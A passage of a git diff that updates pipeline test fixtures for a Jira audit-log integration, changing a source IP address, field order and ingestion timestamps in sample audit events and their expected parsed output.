b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log @@ -75,12 +75,12 @@ {"affectedObjects":[{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme updated","actionI18nKey":"jira.auditing.permission.scheme.updated","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"from":"","i18nKey":"admin.common.words.permission","key":"Permission","to":"Manage Sprints"},{"from":"","i18nKey":"admin.common.words.type","key":"Type","to":"Application access"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":239000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme updated","actionI18nKey":"jira.auditing.permission.scheme.updated","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"from":"","i18nKey":"admin.common.words.permission","key":"Permission","to":"Start/Complete Sprints"},{"from":"","i18nKey":"admin.common.words.type","key":"Type","to":"Application access"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":241000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme updated","actionI18nKey":"jira.auditing.permission.scheme.updated","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"from":"","i18nKey":"admin.common.words.permission","key":"Permission","to":"Edit Sprints"},{"from":"","i18nKey":"admin.common.words.type","key":"Type","to":"Application access"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":243000000},"version":"1.0"} -{"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"0","name":"Default Permission Scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme removed from project","actionI18nKey":"jira.auditing.permission.scheme.removed.from.project","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"55.6.73.144","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":249000000},"version":"1.0"} +{"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"0","name":"Default Permission Scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme removed from project","actionI18nKey":"jira.auditing.permission.scheme.removed.from.project","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"175.16.199.1","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":249000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"10000","name":"Default software scheme","type":"SCHEME"}],"auditType":{"action":"Permission scheme added to project","actionI18nKey":"jira.auditing.permission.scheme.added.to.project","area":"PERMISSIONS","category":"permissions","categoryI18nKey":"jira.auditing.category.permissions","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":266000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"test","type":"PROJECT"},{"id":"JIRAUSER10000","name":"test.user","type":"USER"}],"auditType":{"action":"Project created","actionI18nKey":"jira.auditing.project.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"test"},{"i18nKey":"common.words.key","key":"Key","to":"TEST"},{"i18nKey":"common.concepts.description","key":"Description","to":""},{"i18nKey":"common.concepts.projectlead","key":"Project Lead","to":"test.user"},{"i18nKey":"admin.projects.default.assignee","key":"Default Assignee","to":"Unassigned"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":297000000},"version":"1.0"} {"affectedObjects":[{"id":"10100","name":"Developers","type":"PROJECT_ROLE"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project roles changed","actionI18nKey":"jira.auditing.project.roles.changed","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"admin.common.words.users","key":"Users","to":"JIRAUSER10000"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":506000000},"version":"1.0"} {"affectedObjects":[{"id":"10000","name":"Version 1.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version created","actionI18nKey":"jira.auditing.version.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"Version 1.0"},{"i18nKey":"version.releasedate","key":"Release date","to":"2021-11-14"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":521000000},"version":"1.0"} -{"affectedObjects":[{"id":"10000","name":"Version 1.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version released","actionI18nKey":"jira.auditing.version.released","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"55.6.73.144","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":535000000},"version":"1.0"} +{"affectedObjects":[{"id":"10000","name":"Version 1.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version released","actionI18nKey":"jira.auditing.version.released","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[],"method":"Browser","source":"175.16.199.1","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":535000000},"version":"1.0"} {"affectedObjects":[{"id":"10001","name":"Version 2.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version created","actionI18nKey":"jira.auditing.version.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"Version 2.0"},{"i18nKey":"version.releasedate","key":"Release date","to":"2021-11-28"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":543000000},"version":"1.0"} {"affectedObjects":[{"id":"10002","name":"Version 3.0","type":"VERSION"},{"id":"10000","name":"test","type":"PROJECT"}],"auditType":{"action":"Project version created","actionI18nKey":"jira.auditing.version.created","area":"LOCAL_CONFIG_AND_ADMINISTRATION","category":"projects","categoryI18nKey":"jira.auditing.category.projects","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[{"i18nKey":"common.words.name","key":"Name","to":"Version 3.0"}],"extraAttributes":[],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539714,"nano":545000000},"version":"1.0"} {"affectedObjects":[],"auditType":{"action":"Audit Log search performed","actionI18nKey":"atlassian.audit.event.action.audit.search","area":"AUDIT_LOG","category":"Auditing","categoryI18nKey":"atlassian.audit.event.category.audit","level":"BASE"},"author":{"id":"10000","name":"test.user","type":"ApplicationUser","uri":"/secure/ViewProfile.jspa?name=test.user"},"changedValues":[],"extraAttributes":[{"name":"Results returned","nameI18nKey":"atlassian.audit.event.attribute.results","value":"85"},{"name":"Query","nameI18nKey":"atlassian.audit.event.attribute.query","value":""},{"name":"Timestamp Range","nameI18nKey":"atlassian.audit.event.attribute.timestamp","value":"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z"},{"name":"ID Range","nameI18nKey":"atlassian.audit.event.attribute.id","value":"1 - 85"}],"method":"Browser","source":"10.50.33.72","system":"http://jira.internal:8088","timestamp":{"epochSecond":1637539922,"nano":856000000},"version":"1.0"} diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index e689e71c833..d806d889541 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "10.50.33.72", - "ip": "10.50.33.72" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { "version": "1.12.0" @@ -26,9 +19,13 @@ "service": { "address": "http://jira.internal:8088" }, + "source": { + "address": "10.50.33.72", + "ip": "10.50.33.72" + }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-08T14:50:53.782511828Z", + "ingested": "2021-12-15T09:00:47.652585890Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"jira.auditing.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":514000000},\"version\":\"1.0\"}", "type": [ "group", @@ -43,6 +40,9 @@ "name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "jira": { "audit": { "method": "Browser", @@ -91,7 +91,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782517772Z", + "ingested": "2021-12-15T09:00:47.652590454Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":579000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -167,7 +167,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782520488Z", + "ingested": "2021-12-15T09:00:47.652593251Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":581000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -243,7 +243,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782522938Z", + "ingested": "2021-12-15T09:00:47.652595997Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":583000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -319,7 +319,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782525339Z", + "ingested": "2021-12-15T09:00:47.652601532Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":584000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -395,7 +395,7 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-08T14:50:53.782527742Z", + "ingested": "2021-12-15T09:00:47.652604496Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\"}],\"auditType\":{\"action\":\"New license added\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"system\",\"categoryI18nKey\":\"jira.auditing.category.system\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"admin.license.organisation\",\"key\":\"Organization\",\"to\":\"myself\"},{\"i18nKey\":\"admin.license.date.purchased\",\"key\":\"Date Purchased\",\"to\":\"21/Nov/21\"},{\"i18nKey\":\"admin.license.type\",\"key\":\"License Type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"i18nKey\":\"admin.server.id\",\"key\":\"Server ID\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"i18nKey\":\"admin.license.sen\",\"key\":\"Support Entitlement Number (SEN)\",\"to\":\"SEN-L17782970\"},{\"i18nKey\":\"admin.license.user.limit\",\"key\":\"User Limit\",\"to\":\"Unlimited\"},{\"i18nKey\":\"jira-software\",\"key\":\"jira-software\",\"to\":\"-1\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":596000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -491,7 +491,7 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-08T14:50:53.782536675Z", + "ingested": "2021-12-15T09:00:47.652607271Z", "original": "{\"affectedObjects\":[{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"jira.auditing.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"user management\",\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.username\",\"key\":\"Username\",\"to\":\"test.user\"},{\"i18nKey\":\"common.words.fullname\",\"key\":\"Full name\",\"to\":\"Alex\"},{\"i18nKey\":\"common.words.email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"admin.common.phrases.active.inactive\",\"key\":\"Active / Inactive\",\"to\":\"Active\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":600000000},\"version\":\"1.0\"}", "type": [ "user", @@ -587,7 +587,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:53.782539333Z", + "ingested": "2021-12-15T09:00:47.652610010Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":734000000},\"version\":\"1.0\"}", "type": [ "group", @@ -662,7 +662,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782541787Z", + "ingested": "2021-12-15T09:00:47.652612800Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":750000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -738,7 +738,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782544250Z", + "ingested": "2021-12-15T09:00:47.652615549Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":751000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -814,7 +814,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782546672Z", + "ingested": "2021-12-15T09:00:47.652618294Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":752000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -890,7 +890,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782549315Z", + "ingested": "2021-12-15T09:00:47.652621195Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":754000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -967,7 +967,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:53.782551766Z", + "ingested": "2021-12-15T09:00:47.652623943Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":756000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1042,7 +1042,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782554184Z", + "ingested": "2021-12-15T09:00:47.652626701Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":138000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1117,7 +1117,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782556614Z", + "ingested": "2021-12-15T09:00:47.652629589Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"Manage Sprints\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"\"},{\"from\":\"Project Role\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"\"},{\"from\":\"Administrators\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":158000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1192,7 +1192,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782559050Z", + "ingested": "2021-12-15T09:00:47.652632198Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":162000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1267,7 +1267,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782561583Z", + "ingested": "2021-12-15T09:00:47.652633660Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10100\",\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field 